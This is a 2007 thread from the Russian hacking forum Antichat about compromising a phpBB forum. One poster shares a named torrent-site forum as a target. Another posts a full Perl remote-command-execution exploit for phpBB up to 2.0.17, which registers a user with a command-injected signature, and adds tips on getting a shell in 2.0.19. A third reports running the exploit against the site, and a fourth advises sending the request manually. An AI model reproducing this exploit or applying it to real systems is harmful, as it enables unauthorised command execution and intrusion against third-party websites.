ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.08.2007, 13:13
Аватар для DeBugger
DeBugger
Участник форума
Регистрация: 06.09.2006
Сообщений: 139
Провел на форуме:
1026322

Репутация: 124
Отправить сообщение для DeBugger с помощью ICQ
По умолчанию

А ты уверен в уязвимости форума? Успешная регистрация не гарантирует успешное выполнение комманды.
 
Ответить с цитированием

  #12  
Старый 29.08.2007, 13:34
Аватар для shiky
shiky
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847

Репутация: 0
По умолчанию

если хочешь посмотреть на сие чудо-тебе сюда =)

http://torrents.ok.vsi.ru/forum/

Последний раз редактировалось shiky; 29.08.2007 в 13:39..
 
Ответить с цитированием

  #13  
Старый 29.08.2007, 15:25
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Если не сложно, то объясните суть уязвимости, какой скрипт бажный и т.д.. что именно делают эти сплойты???
 
Ответить с цитированием

  #14  
Старый 29.08.2007, 18:21
Аватар для DeBugger
DeBugger
Участник форума
Регистрация: 06.09.2006
Сообщений: 139
Провел на форуме:
1026322

Репутация: 124
Отправить сообщение для DeBugger с помощью ICQ
Post

Цитата:
Сообщение от Nightmarе  
Если не сложно, то объясните суть уязвимости, какой скрипт бажный и т.д.. что именно делают эти сплойты???
Вот образец сплойта. Думаю поймёшь, что он делает:
Код:
#!/usr/bin/perl 

# phpBB <= 2.0.17 remote command execution exploit 
# need for work: 
# 1. PHP 5 < 5.0.5 
# 2. register_globals=On 
# 3. magic_quotes off 
# ------------------------------------------------ 
# (c)oded by 1dt.w0lf 
# RST/GHC 
# http://rst.void.ru 
# http://ghc.ru 
# 03.11.05 

use LWP::UserAgent; 
use HTTP::Cookies; 

if(@ARGV < 2) { usage(); } 

head(); 

$xpl = LWP::UserAgent->new() or die; 
$cookie_jar = HTTP::Cookies->new(); 

for($i=0;$i<5;$i++) 
{ 
$rand .= int(rand(9)); 
} 

$name = 'Gavrik'.$rand; 
$password = 'Gavrik'.$rand; 
$path = $ARGV[0]; 
$cmd = $ARGV[1]; 
$xpl->cookie_jar( $cookie_jar ); 

$res = $xpl->post( 
$path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00', 

Content => [ 
'username' => $name, 
'email' => $rand.'_bill_gates@microsoft.com', 
'new_password' => $password, 
'password_confirm' => $password, 
'signature' => 'r57:`'.$cmd.'`', 
'viewemail' => '0', 
'hideonline' => '1', 
'notifyreply' => '0', 
'notifypm' => '0', 
'popup_pm' => '0', 
'attachsig' => '0', 
'allowbbcode' => '1', 
'allowhtml' => '1', 
'allowsmilies' => '0', 
'mode' => 'register', 
'agreed' => 'true', 
'coppa' => '0', 
'submit' => 'Submit', 
], 
); 
if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); } 
else { print "Done. User $name successfully registered!\r\n"; } 
$res = $xpl->post( 
$path.'login.php', 
Content => [ 
'username' => $name, 
'password' => $password, 
'redirect' => '', 
'login' => 'Log in', 
],Referer => $path.'login.php'); 

$res = $xpl->get($path.'profile.php?mode=editprofile'); 
@content = split("\n",$res->content); 
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
for(@content) 
{ 
if(/<\/textarea>/) { $p = 0; } 
print $_."\r\n" if $p; 
if(/<textarea name="signature"/){ $p = 1; } 
} 
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 

sub head() 
{ 
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/ GHC\r\n"; 
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
} 
sub usage() 
{ 
head(); 
print " Usage: r57phpBB2017.pl <path> <cmd>\r\n"; 
print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n"; 
print " <cmd> - Command for execute\r\n"; 
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n" ; 
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
exit(); 
}
В версии 2.0.19 эта возможность блокирована, но суть баги жива. Через восстановление БД форума можно изменить необходимые поля и получить шелл.

Кстати, форум по ссылке мёртв. Кто-то уже добрался?
 
Ответить с цитированием

  #15  
Старый 13.10.2007, 22:10
Аватар для shiky
shiky
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847

Репутация: 0
По умолчанию

Возможно-он не отвечает около 2-х недель. но не я виновник =)
 
Ответить с цитированием

  #16  
Старый 13.10.2007, 22:19
Аватар для shiky
shiky
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847

Репутация: 0
По умолчанию

и еще. сплоит выдал: Done. User Gavrik06526 successfully registered! что дальше делать?
 
Ответить с цитированием

  #17  
Старый 14.10.2007, 21:33
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Цитата:
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
это первое что нужно. ес ли это выполняетчся, то лучше использовать все вручную, благо сплоит - один единственный запрос к сайту )
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Gene6 ftp FAQ по настройке. prox1kk Soft - Windows 1 17.03.2007 00:36
ОТЛИЧНАЯ СТАТЬЯ - "Как заметать следы" foreva Чужие Статьи 8 07.02.2005 12:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ